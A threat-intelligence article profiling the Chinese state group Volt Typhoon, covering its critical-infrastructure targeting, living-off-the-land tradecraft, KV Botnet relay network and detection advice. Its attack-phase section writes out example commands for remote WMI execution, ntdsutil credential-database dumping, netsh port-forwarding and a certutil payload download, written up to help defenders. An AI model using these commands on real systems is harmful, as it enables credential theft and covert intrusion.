Threat Intelligence

Volt Typhoon: Silent Presence — China's Pre-Positioning Campaign in Western Critical Infrastructure Using Living-off-the-Land Techniques and Stealth Persistence

> threat_actor Volt Typhoon —— origin: China (PRC) —— alias: Vanguard Panda / Bronze Silhouette —— signature: LOTL pre-positioning in critical infrastructure<span class="cursor-blink">_</span>_

Hedgehog Security 5 January 2026 20 min read
volt-typhoon china critical-infrastructure lotl living-off-the-land threat-intelligence pre-positioning cyber-espionage

The group that hides in plain sight.

Volt Typhoon — also tracked as Vanguard Panda, Bronze Silhouette, DEV-0391, Insidious Taurus, and UNC3236 — is a Chinese state-sponsored threat group that has been conducting cyber operations against Western critical infrastructure since at least 2021, with evidence suggesting activity potentially stretching back to mid-2020 or earlier. What makes Volt Typhoon singular in the threat landscape is not the sophistication of their custom tooling — because they deploy almost none — but rather the discipline of their operational methodology. Volt Typhoon has built and maintained persistent access to critical infrastructure networks across the United States, including energy utilities, water treatment facilities, telecommunications providers, transportation systems, and military-adjacent installations, using almost exclusively the tools and features that are already present on the victim systems they compromise. This living-off-the-land approach represents a fundamental challenge to defenders: the adversary's actions are virtually indistinguishable from the daily activities of legitimate system administrators.

The group first entered public consciousness on 24 May 2023, when Microsoft published a detailed threat intelligence report attributing a campaign targeting US critical infrastructure organisations in Guam and elsewhere to a state-sponsored actor based in China. The disclosure was coordinated with the US National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the intelligence agencies of the Five Eyes alliance — Australia, Canada, New Zealand, and the United Kingdom. The joint advisory was extraordinary in its breadth and urgency: five nations publicly attributing an active, ongoing campaign designed not to steal data, but to pre-position for potential disruption of critical services during a future geopolitical crisis. The subtext was unmistakable — this was preparation for a potential military conflict over Taiwan, and the battlefield extended to American water supplies, power grids, and communications networks.

What distinguishes Volt Typhoon from virtually every other documented advanced persistent threat group is the apparent objective of their operations. Traditional cyber espionage groups — including China's own APT41, APT10, and APT40 — seek to exfiltrate data: intellectual property, diplomatic communications, military plans, personal information. Volt Typhoon shows minimal interest in data theft. Instead, their operational pattern is consistent with what military planners call operational preparation of the environment (OPE) — establishing access to systems whose disruption would degrade an adversary's ability to project military power, sustain civilian morale, and maintain economic stability during a conflict. The targets — power generation, water treatment, port operations, telecommunications switching centres — are precisely those whose failure would have cascading effects on both military logistics and civilian life. Volt Typhoon is not collecting intelligence; they are building a capability to cause real-world harm at a time of their choosing.


Linking Volt Typhoon to the People's Republic of China.

Attribute Detail
Tracked Names Volt Typhoon (Microsoft, current), Vanguard Panda (CrowdStrike), Bronze Silhouette (Secureworks), DEV-0391 (Microsoft, legacy designation), Insidious Taurus (Palo Alto Networks / Unit 42), UNC3236 (Mandiant/Google). The Microsoft naming convention places the group under the 'Typhoon' designator, which Microsoft reserves for threat actors attributed to the People's Republic of China.
Country of Origin People's Republic of China — Volt Typhoon's operations are assessed with high confidence by the United States Intelligence Community, Microsoft Threat Intelligence, and the intelligence agencies of all Five Eyes nations to be state-sponsored and directed by the PRC. The specific organisational affiliation within the Chinese state apparatus has not been publicly confirmed with the same granularity as some other Chinese groups, though operational characteristics and targeting patterns are consistent with People's Liberation Army (PLA) strategic support or intelligence bureau tasking rather than Ministry of State Security (MSS) civilian intelligence collection.
Suspected Affiliation PLA Strategic Support Force (SSF) or affiliated military intelligence unit — assessed based on the group's focus on operational preparation of critical infrastructure rather than traditional intelligence collection. Unlike MSS-affiliated groups (APT10, APT41) that focus on economic espionage and intellectual property theft, Volt Typhoon's targeting of military-adjacent infrastructure, particularly in Guam — home to Andersen Air Force Base and Naval Base Guam, both critical to US force projection in the Indo-Pacific — aligns with military operational planning objectives. The PRC government has publicly denied the attribution, with China's National Computer Virus Emergency Response Centre publishing a counter-report in April 2024 alleging that Volt Typhoon is fabricated by US intelligence agencies.
First Observed At least mid-2021, with some indicators suggesting earlier activity dating to 2020 or possibly before. Microsoft's initial May 2023 disclosure noted activity dating back to mid-2021. Subsequent investigations by CISA, Mandiant, and Secureworks identified artifacts and infrastructure usage patterns suggesting the group may have been operational for longer than initially assessed. The group's emphasis on stealth and living-off-the-land techniques means that earlier activity may have gone undetected — the very nature of their tradecraft is designed to avoid generating the forensic artifacts that would enable historical attribution.
Primary Motivation Pre-positioning for disruption — Volt Typhoon's assessed objective is to establish and maintain persistent access to Western critical infrastructure networks, particularly in the United States and its Pacific territories, to enable disruptive or destructive cyber operations during a future geopolitical crisis or military conflict. This represents a departure from traditional Chinese cyber operations focused on espionage and intellectual property theft. CISA Director Jen Easterly has publicly stated that Volt Typhoon's activity represents 'the real-world threat that the Chinese government poses to our critical infrastructure' and warned that the group is 'pre-positioning themselves on American infrastructure to be able to cause disruption and destruction in the event of a conflict.' FBI Director Christopher Wray described the threat as 'the defining threat of our generation.'

Critical infrastructure as the battlespace.

Volt Typhoon's targeting is narrower than many Chinese APT groups but far more strategically focused. Rather than casting a wide net across industries for intellectual property, Volt Typhoon exclusively targets sectors whose disruption would have immediate, cascading consequences on national security, military operations, and civilian welfare. Every confirmed target aligns with a military planning objective: degrade the adversary's ability to deploy forces, communicate, sustain energy supplies, and maintain public order. The geographic focus is overwhelmingly the continental United States and US Pacific territories — particularly Guam, which serves as a critical staging point for US military operations in the Indo-Pacific theatre. Secondary targeting has been reported against critical infrastructure in Australia, Canada, and the United Kingdom, all Five Eyes alliance members with mutual defence obligations.

Sector Strategic Value Observed Targeting
Energy & Utilities Disruption of power generation and distribution would cripple military installations, civilian infrastructure, and economic activity simultaneously — the single highest-impact target category in any conflict scenario Confirmed compromises of electric utility companies, oil and natural gas pipeline operators, and renewable energy facilities across the continental United States. CISA advisories specifically identified energy sector organisations among Volt Typhoon's victims. Access to operational technology (OT) networks and supervisory control and data acquisition (SCADA) systems was assessed as a priority objective.
Water & Wastewater Water treatment and distribution systems are essential for both civilian populations and military installations — disruption creates immediate public health emergencies and degrades military base operations CISA confirmed that Volt Typhoon maintained access to water and wastewater treatment facility networks for extended periods. In at least one case, the group maintained persistent access to a water utility's IT environment for over five years before detection. The convergence of IT and OT networks in many water utilities creates pathways from initial IT compromise to operational control systems.
Telecommunications Communications infrastructure is fundamental to military command and control, emergency services coordination, and civilian information flow — its degradation during a conflict would severely hamper defensive response Multiple US telecommunications providers and internet service providers were confirmed as Volt Typhoon victims. Compromise of telecommunications infrastructure provides both intelligence collection opportunities (monitoring communications) and pre-positioned disruption capability (degrading or severing communications during a crisis). Some overlap has been noted with the broader Salt Typhoon telecommunications campaign, though these are assessed as distinct operations.
Transportation & Maritime Ports, shipping lanes, rail networks, and aviation systems are critical for military force projection, logistics, and civilian commerce — particularly Pacific maritime routes essential for Indo-Pacific operations Volt Typhoon targeted transportation sector organisations including port authorities, maritime logistics companies, and aviation support infrastructure. Guam's port facilities — essential for US Navy operations in the Western Pacific — were specifically identified as targets. Disruption of maritime logistics would directly impair the ability to sustain military operations thousands of miles from the continental United States.
Defence Industrial Base Companies that manufacture, develop, and maintain military systems and equipment — disruption would degrade the capacity to sustain and resupply military forces during a conflict Defence contractors and suppliers supporting US military operations were among confirmed Volt Typhoon targets. Unlike traditional espionage-focused targeting of the DIB (which seeks to steal weapons designs and specifications), Volt Typhoon's interest appears oriented toward understanding supply chain dependencies and identifying disruption points rather than exfiltrating technical data.
Government & Emergency Services Federal, state, and local government systems manage civilian emergency response, public communications, and coordination of critical services — their disruption during a crisis would amplify chaos and degrade national resilience Government networks at multiple levels — including emergency management systems, public safety communications, and administrative IT environments — were identified among Volt Typhoon's targets. The group's interest in government systems appears focused on those that coordinate emergency response and civilian services rather than traditional intelligence targets like policy documents or diplomatic communications.
Information Technology IT service providers and managed service providers offer potential access to downstream client networks across multiple critical infrastructure sectors — a force multiplier for initial access operations Volt Typhoon targeted IT companies and managed service providers whose client bases include critical infrastructure organisations. Compromising an MSP provides a pathway to multiple downstream victims without requiring separate initial access operations against each target — a technique that maximises reach while minimising operational exposure.

Living off the land — invisible by design.

Volt Typhoon's defining characteristic is their near-total reliance on living-off-the-land binaries and scripts (LOLBins/LOLBas) — legitimate tools, commands, and features that are pre-installed on every Windows and network device operating system. Where most advanced persistent threat groups develop custom malware that provides unique capabilities but also creates unique detection signatures, Volt Typhoon has made the strategic decision to forgo custom tooling almost entirely. Their operators use the same commands that system administrators use every day: wmic for system queries, ntdsutil for Active Directory database extraction, netsh for network configuration and port forwarding, PowerShell for automation and remote execution, certutil for file transfers, and cmd.exe for general command execution. The result is an adversary whose forensic footprint is functionally identical to normal administrative activity.

This approach imposes significant constraints on the operator — LOLBins lack the flexibility, automation, and resilience of purpose-built implants — but it confers an enormous defensive advantage: there is no malware to detect. No custom binary to signature. No novel network protocol to flag. No suspicious file hash to blocklist. Every tool Volt Typhoon uses is a legitimate, Microsoft-signed, pre-installed operating system component that cannot be removed or blocked without breaking normal system functionality. Traditional indicator-of-compromise (IOC) based detection — the foundation of most security operations — is rendered almost entirely ineffective. Detection must instead be based on behavioural analysis: understanding not what tool is being run, but the context, sequence, timing, and parameters of its execution. This is orders of magnitude more difficult than pattern-matching against known malicious artifacts.

The operational security extends beyond tool selection to every aspect of tradecraft. Volt Typhoon routes their traffic through compromised small office/home office (SOHO) routers and VPN appliances — devices manufactured by NETGEAR, Cisco, Fortinet, Zyxel, and others — creating a network of operational relay boxes (ORBs) that make their command-and-control traffic appear to originate from residential and small business IP addresses within the victim's own geographic region. This geographically proximate routing defeats a common detection heuristic — flagging connections from unusual or foreign IP ranges. When a US power utility sees a connection from a residential IP address in the same state, it does not trigger the same alarms as a connection from a known hostile IP range in East Asia. The compromised SOHO devices, collectively managed through what researchers have termed the KV Botnet, provide a disposable, rotating, and geographically distributed C2 infrastructure that is exceptionally difficult to disrupt or track.

Volt Typhoon — Living-off-the-Land Operations Model
Phase 1 — Initial Access via Edge Device Exploitation
✓ Identify internet-facing appliance (Fortinet FortiGuard, Ivanti, Cisco, NETGEAR)
✓ Exploit known vulnerability (e.g., CVE-2023-27997 FortiOS, CVE-2024-21887 Ivanti)
✓ Obtain shell access to edge appliance — first foothold established
✓ Extract credentials from appliance configuration and memory

Phase 2 — Credential Harvesting and Lateral Movement (LOTL)
$ wmic /node:"TARGET" process call create "cmd /c whoami > C:\temp\o.txt" Remote command execution via WMI
$ ntdsutil "ac i ntds" "ifm" "create full C:\temp\ntds" quit quit Dump Active Directory database (ntds.dit) for offline credential extraction
$ netsh interface portproxy add v4tov4 listenport=8443 connectaddress=10.0.0.5 connectport=443 Create port forwarding rule — pivoting without deploying tools
$ certutil -urlcache -split -f http://internal-staging/payload.bin C:\temp\p.bin File transfer using built-in Windows certificate utility
$ powershell -ep bypass -c "Get-ADComputer -Filter * | Select Name,IPv4Address" Active Directory enumeration via PowerShell

Phase 3 — Persistence Establishment (No Malware Deployed)
✓ Create local administrator accounts or modify existing service accounts
✓ Modify legitimate scheduled tasks to execute reconnaissance commands
✓ Configure port forwarding rules (netsh portproxy) for persistent tunnels
✓ Leverage valid domain credentials — blend with legitimate logon activity
✓ Maintain access for months to years without triggering alerts

Phase 4 — C2 via Operational Relay Boxes (ORBs)
✓ Compromise SOHO routers (NETGEAR, Cisco RV, Fortinet, Zyxel, ASUS)
✓ Deploy KV Botnet implant on compromised router — join ORB network
✓ Route C2 traffic through geographically proximate residential IPs
✓ Traffic appears as normal residential/small business internet activity
✓ Rotate ORB nodes regularly — burned infrastructure replaced seamlessly

Phase 5 — Pre-Positioned for Disruption
✓ Persistent access maintained across multiple critical infrastructure sectors
✓ Network topology mapped — OT/ICS boundary identified
✓ Capability to disrupt services on command during geopolitical crisis
✓ No data exfiltration observed — objective is access, not intelligence
✓ Disruption capability held in reserve — activated only if conflict escalates

No malware required — your own tools weaponised.

Tool Type Capabilities
wmic.exe LOLBin (Windows Built-in) Windows Management Instrumentation Command-line — used by Volt Typhoon for remote process execution, system enumeration, and lateral movement. WMIC allows operators to query system information (hardware, software, network configuration, running processes) and execute commands on remote systems using valid credentials, all without deploying any additional tooling. Commands such as wmic /node:TARGET process call create enable remote code execution that is indistinguishable from legitimate administrative activity.
ntdsutil.exe LOLBin (Windows Built-in) Active Directory Domain Services management utility — Volt Typhoon uses ntdsutil's Install From Media (IFM) capability to create a full copy of the Active Directory database (ntds.dit), which contains password hashes for all domain accounts. The extracted database is then processed offline using tools like Impacket's secretsdump to recover credentials. This technique provides access to every account in the domain without triggering the account lockout or failed logon alerts that brute-force attacks would generate.
netsh.exe LOLBin (Windows Built-in) Network Shell — a versatile networking utility used by Volt Typhoon primarily for its port proxy functionality. The command netsh interface portproxy creates port forwarding rules that redirect network traffic from one port to another, enabling operators to tunnel through compromised hosts to reach internal network segments without deploying dedicated proxy or pivoting tools. Netsh is also used for firewall rule manipulation, network interface configuration, and capturing diagnostic information.
PowerShell LOLBin (Windows Built-in) Volt Typhoon uses PowerShell for Active Directory enumeration, system reconnaissance, and automation of repetitive tasks. Commands target AD objects (computers, users, groups), network shares, and system configurations. PowerShell's remoting capabilities (Enter-PSSession, Invoke-Command) also provide lateral movement without additional tooling. Volt Typhoon typically operates with execution policy bypassed and, where possible, uses PowerShell commands that avoid loading the full PowerShell engine to reduce logging visibility.
certutil.exe LOLBin (Windows Built-in) Windows Certificate Services utility repurposed by Volt Typhoon as a file transfer mechanism. The command certutil -urlcache -split -f [URL] [output] downloads files from remote servers using a trusted, Microsoft-signed binary that is rarely monitored by security controls. Certutil is also used for Base64 encoding/decoding of payloads and for computing file hashes. Its legitimate administrative purpose makes its execution difficult to distinguish from normal certificate management operations.
cmd.exe LOLBin (Windows Built-in) The Windows command interpreter — the most fundamental LOLBin. Volt Typhoon uses cmd.exe for general command execution, batch scripting, environment variable manipulation, and as the parent process for other LOLBin invocations. Command-line activity is logged only when enhanced audit logging or command-line process creation auditing is explicitly enabled — a configuration that is not default on most Windows installations, giving operators a significant advantage in environments without mature logging infrastructure.
Impacket Open-Source Tooling (Python) A collection of Python classes for working with network protocols — Volt Typhoon uses Impacket modules including wmiexec (WMI-based remote execution), secretsdump (credential extraction from SAM, NTDS, and LSA), and smbexec (SMB-based command execution). Impacket is widely used by both penetration testers and threat actors, making its use difficult to attribute. Volt Typhoon's use of Impacket represents one of their few deviations from pure built-in tools, though it remains an open-source, publicly available framework rather than custom malware.
FRP (Fast Reverse Proxy) Open-Source Tooling A fast reverse proxy application used by Volt Typhoon to expose internal services behind NAT or firewalls to external networks. FRP enables operators to create encrypted tunnels from compromised internal hosts to external C2 infrastructure, providing persistent access channels that bypass firewall egress restrictions. FRP is a legitimate, widely-used open-source networking tool, further complicating detection based on binary analysis or hash matching.
KV Botnet Custom C2 Infrastructure The primary command-and-control infrastructure supporting Volt Typhoon operations. The KV Botnet consists of compromised small office/home office (SOHO) routers and networking devices — including NETGEAR ProSAFE, Cisco RV320/RV325, DrayTek Vigor, and Axis IP cameras — that serve as operational relay boxes (ORBs). The botnet provides geographically distributed, disposable C2 nodes that make Volt Typhoon's traffic appear to originate from legitimate residential and small business IP addresses. The FBI conducted a court-authorised disruption operation against the KV Botnet in January 2024, remotely removing malware from hundreds of compromised routers — though analysts assess that Volt Typhoon likely rebuilt portions of the infrastructure.
Living-off-the-Land Scripts Custom Batch/Shell Scripts Where Volt Typhoon does create files on disk, they are typically simple batch scripts (.bat) or shell scripts that chain together LOLBin commands for automated reconnaissance, credential collection, and data staging. These scripts use only built-in commands and do not contain sophisticated logic or obfuscation — they are functional, disposable, and designed to look indistinguishable from administrative automation scripts. After execution, scripts are typically deleted to minimise forensic artifacts.

Through the edge — where patching fails.

Internet-Facing Appliance Exploitation
Volt Typhoon's primary initial access vector is the exploitation of known vulnerabilities in internet-facing network appliances — particularly Fortinet FortiGuard devices (CVE-2023-27997, a critical heap buffer overflow in FortiOS SSL-VPN), Ivanti Connect Secure VPN appliances (CVE-2023-46805 and CVE-2024-21887, an authentication bypass and command injection chain), and Cisco networking equipment. These edge devices are attractive targets because they sit at the network perimeter, often run outdated firmware, and provide authenticated access to the internal network upon compromise. Volt Typhoon has demonstrated the ability to extract credentials stored on these appliances and use them to authenticate to the broader Active Directory environment, transitioning from edge device access to full domain compromise.
SOHO Router Compromise (ORB Network)
Volt Typhoon systematically compromises end-of-life and unpatched small office/home office (SOHO) routers from manufacturers including NETGEAR, Cisco, DrayTek, Zyxel, and FatPipe. These devices serve dual purposes: as operational relay boxes (ORBs) for proxying command-and-control traffic to make it appear geographically proximate to the target, and as initial access points when SOHO devices are on the same network as target infrastructure (common in smaller utilities and municipal systems). Many of these devices run legacy firmware that no longer receives security updates, have default credentials, or expose management interfaces to the public internet — making them trivially exploitable at scale.
Valid Credential Abuse
Once Volt Typhoon obtains legitimate credentials — whether extracted from compromised edge appliances, harvested from Active Directory database dumps, or obtained through other means — they leverage those credentials for access and lateral movement exclusively through legitimate authentication channels. They log in via standard protocols (RDP, SMB, WinRM, SSH) using valid domain accounts, often during normal business hours to blend with legitimate user activity. This approach generates authentication events that are indistinguishable from normal user logons, defeating detection mechanisms that rely on identifying unauthorised or anomalous authentication methods.
VPN and Remote Access Exploitation
Virtual private network (VPN) concentrators and remote access gateways are high-priority targets for Volt Typhoon because they provide direct, authenticated network access by design. Exploitation of VPN appliance vulnerabilities — or use of credentials stolen from compromised appliances — grants Volt Typhoon the same level of network access as a legitimate remote employee or administrator. VPN access is particularly valuable because it typically bypasses many network-level security controls that inspect traffic at the perimeter, and VPN logon events are expected and frequent in modern enterprise environments, reducing the likelihood of detection.
Web Shell Deployment (Limited)
In a small number of documented cases, Volt Typhoon has deployed web shells on compromised internet-facing web servers — representing one of their few uses of persistent file-based implants. Web shells observed in Volt Typhoon operations have been minimal in functionality — often single-line command execution scripts in ASP, PHP, or JSP — designed for initial command execution capability rather than full-featured remote administration. This contrasts with the more elaborate web shells (like China Chopper) commonly used by other Chinese APT groups, reflecting Volt Typhoon's philosophical commitment to minimising on-disk forensic artifacts.
Managed Service Provider Compromise
Volt Typhoon has targeted managed service providers (MSPs) and IT service companies that manage networks for critical infrastructure organisations. Compromising an MSP provides a force-multiplier effect — a single successful intrusion can yield access to dozens of downstream client networks, many of which may be smaller utilities, water districts, or municipal governments that lack dedicated cybersecurity staff. The trust relationships between MSPs and their clients (including administrative credentials, VPN connections, and remote management tools) provide ready-made lateral movement pathways that require no additional exploitation.

From silent intrusion to national security crisis.

Volt Typhoon's campaign history does not follow the pattern of most documented threat groups — there are no headline-grabbing data breaches, no ransomware deployments, no leaked databases appearing on dark web forums. Instead, the history is one of quiet accumulation: methodical, patient, and deeply alarming in its implications. The group's operations came to public attention not because they were detected through traditional security monitoring, but because the United States Intelligence Community, working with Microsoft and international partners, pieced together a pattern of intrusions across disparate critical infrastructure networks that, viewed individually, appeared to be routine compromises but, viewed collectively, revealed a coordinated strategic campaign of unprecedented scope. The fact that Volt Typhoon had operated undetected for at least two years before the May 2023 disclosure — and potentially longer — underscores the effectiveness of their living-off-the-land methodology.

The May 2023 Microsoft and Five Eyes Disclosure was the moment Volt Typhoon became a household name in cybersecurity. On 24 May 2023, Microsoft published a detailed threat intelligence blog post titled 'Volt Typhoon targets US critical infrastructure with living-off-the-land techniques,' attributing a sustained campaign against critical infrastructure organisations in Guam and elsewhere in the United States to a Chinese state-sponsored actor. The same day, CISA, NSA, FBI, and the intelligence agencies of Australia, Canada, New Zealand, and the United Kingdom released a joint cybersecurity advisory (CSA) providing technical indicators, detection guidance, and mitigation recommendations. The coordinated disclosure across five nations was itself significant — it signalled that the intelligence community viewed Volt Typhoon not as a routine espionage operation but as a strategic threat requiring an unprecedented level of international coordination. The advisory specifically highlighted the group's targeting of communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors, with particular emphasis on organisations in Guam.

In February 2024, CISA, NSA, and FBI released a follow-up advisory — 'PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure' — that significantly escalated the urgency of the Volt Typhoon threat assessment. This advisory revealed that Volt Typhoon had maintained persistent access to some victim networks for at least five years, dating back to at least 2019 in some cases. The advisory confirmed compromises across the communications, energy, transportation systems, and water and wastewater systems sectors. CISA Director Jen Easterly stated publicly that 'the PRC cyber threat is not theoretical' and described Volt Typhoon's activity as 'the tip of the iceberg.' FBI Director Christopher Wray testified before Congress that China's hackers were 'positioning on American infrastructure in preparation to wreak havoc and cause real-world harm to American citizens and communities' and characterised the scale of the Chinese hacking programme as being 'on a scale greater than we'd seen before — larger than the combined cyber programmes of every other major nation combined.'

The KV Botnet Disruption (January 2024) represented the first major offensive action against Volt Typhoon's infrastructure. The FBI, acting under court authorisation, conducted a remote operation to disrupt the KV Botnet — Volt Typhoon's network of compromised SOHO routers used as operational relay boxes for C2 communications. The operation remotely removed malware from hundreds of compromised Cisco and NETGEAR routers across the United States, severing a critical component of Volt Typhoon's command-and-control infrastructure. However, security researchers cautioned that the disruption was likely temporary — many of the compromised devices remained vulnerable to re-exploitation (running end-of-life firmware with no available patches), and Volt Typhoon had demonstrated the ability to rapidly rebuild compromised infrastructure. The operation did, however, provide valuable intelligence on the botnet's architecture and the scope of the compromise.

Throughout 2024 and into 2025, additional disclosures revealed the full scope of Volt Typhoon's penetration. Reports emerged of compromises affecting water utilities in Hawaii, a power grid operator on the West Coast, oil and natural gas pipeline companies, and port facilities critical to military logistics. Security researchers at Lumen Technologies' Black Lotus Labs published detailed analysis of the KV Botnet's multiple clusters — KV, JDY, and a third cluster of higher-capability devices used for manual operator interaction — revealing a sophisticated, layered infrastructure designed for resilience. The JDY cluster alone encompassed approximately 1,500 compromised devices at its peak. Simultaneously, the PRC government launched a counter-narrative campaign, with China's National Computer Virus Emergency Response Centre and the National Engineering Laboratory for Computer Virus Prevention Technology publishing reports alleging that Volt Typhoon was fabricated by US intelligence agencies and cybersecurity companies as part of a 'political farce' — claims that were widely dismissed by the international security community but that highlighted the geopolitical sensitivity of the attribution.

The Guam targeting deserves specific attention because of its strategic significance. Guam, a US territory in the Western Pacific, hosts Andersen Air Force Base — home to long-range bomber and tanker aircraft critical to US force projection in the Indo-Pacific — and Naval Base Guam, a forward-deployed submarine and surface ship base. In any conflict scenario involving Taiwan, Guam would serve as a critical logistics hub, staging area, and command centre for US military operations. Volt Typhoon's documented targeting of critical infrastructure in Guam — including telecommunications, power, water, and transportation systems — aligns precisely with a military planning objective to degrade the supporting infrastructure that enables Andersen and Naval Base Guam to operate effectively. Disrupting Guam's civilian infrastructure would simultaneously impair military operations that depend on the same power grid, water supply, and telecommunications networks. This dual-use dependency is precisely what makes Volt Typhoon's pre-positioning so strategically potent.


Finding the needle that looks like hay.

Defending against Volt Typhoon is arguably the hardest detection problem in modern cybersecurity. The group's living-off-the-land approach eliminates the traditional detection advantage that defenders have relied on for decades — the ability to identify adversary activity through malware signatures, suspicious binaries, and anomalous network protocols. When the adversary uses the same tools as your administrators, detection becomes a problem of context rather than content. You cannot block wmic.exe, PowerShell, or netsh.exe — they are essential operating system components. You must instead develop the capability to distinguish between a legitimate administrator running ntdsutil for a routine Active Directory backup and a Volt Typhoon operator running the same command for credential theft. This requires a fundamentally different defensive posture — one centred on behavioural baselining, anomaly detection, and proactive threat hunting rather than signature-based prevention.

Enhanced Command-Line Logging
Enable command-line process creation auditing (Windows Event ID 4688 with command-line logging enabled), PowerShell Script Block Logging (Event ID 4104), PowerShell Module Logging, and Sysmon deployment with comprehensive process creation and network connection rules. Without these logging capabilities, Volt Typhoon's LOTL activities generate no actionable telemetry whatsoever. Critical detection queries include: ntdsutil invocations outside of scheduled backup windows, netsh portproxy commands creating new forwarding rules, wmic commands targeting remote hosts, certutil commands with -urlcache flags, and unusual PowerShell AD enumeration patterns. Forward all logs to a centralised SIEM with retention periods of at least 12 months.
Behavioural Baselining & Anomaly Detection
Establish baselines for normal administrative tool usage — who runs ntdsutil, from which systems, at what times, and how frequently. Volt Typhoon's LOTL techniques can only be detected by identifying deviations from these baselines: an ntdsutil IFM command executed from a workstation rather than a domain controller, wmic remote process creation from a system that has never performed remote administration, netsh portproxy rules created on a server that has never had port forwarding configured, or PowerShell AD enumeration commands executed by a service account that typically only runs automated tasks. User and entity behaviour analytics (UEBA) platforms can automate this baselining at scale.
SOHO Router and Edge Device Hardening
Replace end-of-life SOHO routers and networking equipment that no longer receives firmware updates — these are the building blocks of Volt Typhoon's KV Botnet ORB network. For all network appliances: apply firmware updates immediately upon release, disable remote management interfaces from the public internet, change all default credentials, enable logging and forward logs to a central collector, and monitor for unexpected configuration changes. For enterprise edge devices (Fortinet, Ivanti, Cisco): maintain aggressive patch cadence (24-48 hour SLA for critical vulnerabilities), implement integrity monitoring to detect firmware modification, and deploy out-of-band management networks.
Proactive Threat Hunting
Volt Typhoon will not be found by waiting for alerts — they must be hunted. Priority hunting hypotheses include: search for netsh interface portproxy configurations that were not created by change management processes; identify accounts authenticating from unusual source systems or at unusual times; look for ntdsutil IFM artifacts (ntds.dit copies outside of backup directories); hunt for certutil download artifacts in browser cache equivalent paths; examine scheduled task modifications not aligned with deployment records; and search for evidence of SOHO router compromise on your network perimeter. CISA's published IOCs and YARA rules should be integrated into hunting workflows.
Network Segmentation & OT/IT Boundary Enforcement
Volt Typhoon's ultimate objective appears to be reaching operational technology (OT) and industrial control systems (ICS) that manage physical infrastructure. Enforce strict segmentation between IT and OT networks — ideally with a demilitarised zone (DMZ) architecture and unidirectional data diodes where feasible. Monitor all traffic crossing the IT/OT boundary for anomalous patterns. Implement jump servers with multi-factor authentication and session recording for any administrative access to OT environments. Ensure that compromise of the IT network does not provide a direct pathway to systems that control physical processes — power generation, water treatment, transportation signalling.
Identity and Access Management Hardening
Volt Typhoon's reliance on valid credentials makes identity security critical. Implement phishing-resistant MFA (FIDO2/WebAuthn) for all administrative and remote access. Deploy privileged access management (PAM) with just-in-time (JIT) access provisioning — administrators should not have standing privileged access. Monitor for credential dumping techniques: access to LSASS process memory, creation of ntds.dit copies, registry export of SAM/SECURITY hives. Implement tiered administration models that prevent domain admin credentials from being exposed on lower-tier systems. Rotate service account credentials on a regular schedule and audit their usage patterns.

Volt Typhoon within China's cyber strategy evolution.

Volt Typhoon represents a fundamental evolution in China's cyber operations strategy — a shift from the intelligence collection and economic espionage that characterised the first two decades of Chinese cyber operations toward operational preparation of the environment (OPE) for potential kinetic conflict. For years, Chinese cyber groups — APT1 through the PLA, APT10, APT40, and APT41 through the MSS — focused on stealing intellectual property, conducting surveillance, and gathering diplomatic and military intelligence. Volt Typhoon is doing something categorically different: they are building a war-fighting capability. The transition is consistent with broader PRC military doctrine on 'informatised warfare' and the PLA's concept of 'systems destruction warfare' — the idea that degrading an adversary's information and infrastructure systems can achieve strategic effects equivalent to kinetic military operations. Volt Typhoon is, in essence, the cyber component of China's preparation for a potential conflict over Taiwan, with US critical infrastructure as the target.

Group Affiliation Primary Focus Relationship to Volt Typhoon
Salt Typhoon PRC State-Sponsored Telecommunications provider compromise for intelligence collection — wiretapping capabilities targeting US law enforcement and political figures Complementary operations. Salt Typhoon targets telecoms for intelligence collection (wiretapping); Volt Typhoon targets telecoms for disruption capability. Both compromise similar infrastructure but for fundamentally different objectives. May share access or intelligence on compromised networks.
Flax Typhoon PRC State-Sponsored IoT botnet operations and persistent access to targets in Taiwan, Southeast Asia, and the US — operates the Raptor Train botnet Parallel ORB network operations. Flax Typhoon operates the Raptor Train botnet of compromised IoT devices — a similar concept to Volt Typhoon's KV Botnet but at larger scale (260,000+ devices). Both use compromised edge devices for C2 infrastructure, suggesting a shared doctrinal approach to operational relay networks.
APT41 (Brass Typhoon) MSS (Chengdu 404) Dual-mandate espionage and cybercrime — supply chain attacks, intellectual property theft, and financially motivated operations Different mission entirely. APT41 conducts espionage and cybercrime using custom malware and supply chain compromises. Volt Typhoon conducts infrastructure pre-positioning using LOTL techniques. The contrast is instructive: APT41 represents China's intelligence collection capability; Volt Typhoon represents its war-fighting capability.
APT40 (Leviathan) MSS (Hainan Bureau) Maritime, defence, and engineering espionage aligned with South China Sea interests and naval modernisation APT40 collects intelligence on naval technology and maritime capabilities. Volt Typhoon pre-positions to disrupt the naval logistics infrastructure (ports, communications, power) that enables the US Navy to operate in the Indo-Pacific. APT40 steals the ship designs; Volt Typhoon prepares to disable the ports the ships operate from.
APT10 (Stone Panda) MSS (Tianjin Bureau) Managed service provider targeting for downstream access — broad intellectual property theft campaigns Both target MSPs for downstream access, but APT10 does so for intelligence collection while Volt Typhoon does so to reach critical infrastructure clients. APT10's Operation Cloud Hopper (MSP targeting) established the technique; Volt Typhoon applies it specifically to critical infrastructure sectors.
APT1 (Comment Crew) PLA Unit 61398 Industrial espionage across 20+ industries — the first publicly attributed Chinese APT group (Mandiant 2013 report) APT1 represents the first generation of Chinese military cyber operations — relatively noisy, focused on volume of IP theft. Volt Typhoon represents the current generation — stealthy, patient, focused on strategic pre-positioning rather than data exfiltration. The evolution from APT1 to Volt Typhoon reflects a decade of maturation in Chinese cyber doctrine.
APT31 (Zirconium) MSS (Hubei Bureau) Political espionage targeting government officials, political campaigns, and policy organisations worldwide APT31 conducts political intelligence collection. Volt Typhoon conducts infrastructure pre-positioning. Different missions within the broader Chinese cyber apparatus, with APT31 serving MSS civilian intelligence requirements and Volt Typhoon serving military operational planning objectives.

